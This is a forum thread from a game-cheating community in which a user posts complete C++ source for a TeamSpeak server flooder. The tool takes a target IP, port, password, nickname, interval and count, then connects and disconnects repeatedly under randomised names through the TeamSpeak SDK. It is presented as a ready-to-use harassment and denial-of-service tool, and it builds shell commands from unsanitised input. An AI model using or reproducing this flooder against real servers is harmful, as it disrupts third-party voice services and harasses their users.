Jump to content
Welcome, Guest
Existing user? Sign In

Sign In



Sign Up
The MatriX
  • Welcome To Ghbsys
  • CS GO Streaming Version is released. Have fun streaming while cheating!
  • Have a Payment Issue? Send us a Support ticket.
  • Make a thread if you need support or join our discord for live support.
  • Have Suggestions? Make a thread and you'll earn Ghbsys Points for implemented suggestions.
  • Join our discord to stay well connected! Don't forget to integrate your discord to the site
  • Welcome to [GHB] - GAmEhAcKbAsTaRdS Forum

    Welcome to [GHB] - GAmEhAcKbAsTaRdS Forum, like most online communities you must register to view or post in our community, but don't worry this is a simple free process that requires minimal information for you to signup. Be apart of [GHB] - GAmEhAcKbAsTaRdS Forum by signing in or creating an account.
    • Start new topics and reply to others
    • Subscribe to topics and forums to get email updates
    • Get your own profile page and make new friends
    • Send personal messages to other members.

    Teamspeak Flooder Source


    NeoIII
     Share

    Recommended Posts

    i made this for some other people but here it is:

    // ts_spams.cpp : Defines the entry point for the console application.
    //
    
    #include "stdafx.h"
    #include <windows.h>
    #include <stdlib.h>
    
    int minrand( int min, int max )
    {
    srand( GetTickCount(  ) );
    return min + rand() % ( max - min );
    }
    
    char *szRandomName( char *szNName, int min, int max )
    {
    char *szName = new char[ 256 ];
    srand( GetTickCount( ) );
    sprintf( szName, "%s%i", szNName, minrand( min, max ) );
    return szName;
    }
    
    int ts_connect( char *ip, char *name, char *pass, int port )
    {
    	char *szSpamString = new char[ 256 ];
    	if( pass != NULL )
    	{
    		sprintf( szSpamString, "tscontrol connect teamspeak://%s:%i?password=%s?nickname=%s", ip, port, pass, name );
    	}
    	else
    	{
    		sprintf( szSpamString, "tscontrol connect teamspeak://%s:%i?nickname=%s", ip, port, name );
    	}
    
    	printf( "\n" );
    	return system( szSpamString );
    }
    
    int ts_disconnect( )
    {
    return system( "tscontrol disconnect" );
    }
    
    void ts_spam( char *ip, char *name, char *pass, int port, int times, int sleep )
    {
    for( int i = 0; i < times; i++ )
    {
    	printf( "Spam number %i", i );
    	ts_connect( ip, szRandomName( name, 0, 4000 ), pass, port );
    	ts_disconnect( );
    	Sleep( sleep );
    }
    }
    
    int GetMilliSeconds( int second )
    {
    return second * 1000;
    }
    
    int _tmain(int argc, _TCHAR* argv[])
    {
    char szIP[ 256 ];
    char szName[ 256 ];
    char szPass[ 256 ];
    char szPort[ 256 ];
    char szInterval[ 256 ];
    char szTimes[ 256 ];
    
    int iPort = 0;
    int iInterval = 0;
    int iTimes = 0;
    
    printf( "myg0t.com - teamspeak flooder using sdk\n" );
    
    printf( "What is the IP/Host of the teamspeak server?\n" );
    gets( szIP );
    
    printf( "What is the port you wish to use?\n" );
    gets( szPort );
    iPort = atoi( szPort );
    
    printf( "What is the name you wish to use?\n" );
    gets( szName );
    
    printf( "What is the server password ( if not, leave it blank )?\n" );
    gets( szPass );
    
    printf( "Please enter an interval at which to spam ( milliseconds )\n" );
    gets( szInterval );
    iInterval = atoi( szInterval );
    
    printf( "How many times do you wish to flood?\n" );
    gets( szTimes );
    iTimes = atoi( szTimes );
    
    ts_spam( szIP, szName, szPass, iPort, iTimes, iInterval );
    
    system( "PAUSE" );
    return 0;
    }

     

    requires tscontrol.exe and tsremote.dll ( in the /client_sdk/ folder in the teamspeak directory! )

    Link to comment
    Share on other sites

    • 1 year later...
    Guest
    This topic is now closed to further replies.
     Share

    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...